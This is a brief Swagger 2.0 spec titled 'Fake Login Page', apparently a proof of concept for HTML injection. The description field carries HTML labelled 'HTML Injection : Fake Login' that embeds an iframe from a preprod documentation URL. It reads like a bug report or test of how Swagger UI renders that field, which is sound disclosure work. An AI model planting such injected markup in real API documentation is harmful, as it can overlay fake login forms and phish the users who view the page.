swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Fake Login</h1>
    </div>
    <div class="form-container">
     <p style="text-align:center"><iframe src="https://inf-service-adcollector.plutopreprod.tv/documentation" width="700" height="800" frameBorder="0"></iframe><p style="color:white">
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
